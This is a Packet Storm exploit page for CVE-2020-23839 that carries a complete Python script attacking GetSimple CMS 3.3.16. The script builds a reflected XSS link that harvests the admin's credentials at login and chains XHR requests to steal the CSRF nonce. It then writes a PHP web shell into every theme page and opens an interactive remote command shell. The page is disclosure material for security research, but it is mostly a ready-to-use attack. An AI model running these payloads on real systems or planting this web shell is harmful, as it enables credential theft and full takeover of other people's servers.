exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GetSimple CMS 3.3.16 Cross Site Scripting / Shell Upload

GetSimple CMS 3.3.16 Cross Site Scripting / Shell Upload
Posted Mar 30, 2021
Authored by Bobby Cooke

GetSimple CMS version 3.3.16 cross site scripting to remote shell upload exploit.

tags | exploit, remote, shell, xss
advisories | CVE-2020-23839
SHA-256 | ff447b6110d359109791159d602b028e64b080305d8c9119c22a55bb1534f865

GetSimple CMS 3.3.16 Cross Site Scripting / Shell Upload

Change Mirror Download
# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: March 29th, 2021
# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/
# Version: v3.3.16
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839

# Vulnerability Description:
# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
# Exploit Description:
# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
# Attack Chain:
# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
# 2. Admin then enters their credentials into the GetSimple CMS login portal
# 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
# 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
# 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console

import sys,re,argparse,requests
from urllib.parse import quote
from colorama import (Fore as F, Back as B, Style as S)
from time import sleep

FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')

def webshell(SERVER_URL):
try:
WEB_SHELL = SERVER_URL
getdir = {'FierceGodKick': 'echo %CD%'}
r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
status = r.status_code
cwd = re.findall(r'[CDEF].*', r.text)
if cwd:
cwd = cwd[0]+"> "
term = SB+FG+cwd+FT
print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
while True:
thought = input(term)
command = {'FierceGodKick': thought}
r = requests.post(WEB_SHELL, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
else:
r.raise_for_status()
except:
pass

def urlEncode(javascript):
return quote(javascript)

def genXssPayload():
XSS_PAYLOAD = '/index/javascript:'
XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
XSS_PAYLOAD += 'r=this.responseXML;'
XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
XSS_PAYLOAD += 'xhr3.send(params);'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
XSS_PAYLOAD += 'xhr2.responseType="document";'
XSS_PAYLOAD += 'xhr2.send();'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr1.send(params);'
XSS_PAYLOAD += '%2f%2f'
return XSS_PAYLOAD

def argsetup():
about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
args = parser.parse_args()
return args

if __name__ == "__main__":
print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
args = argsetup()
RHOST = args.TargetSite
WEBAPP_URL = RHOST+'/admin/'
WEBAPP_URL = WEBAPP_URL+'index.php'
PAYLOAD = genXssPayload()
ENCODED_PAYLOAD = urlEncode(PAYLOAD)
print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
sleep(1)
print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
while True:
sleep(1)
webshell(RHOST)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close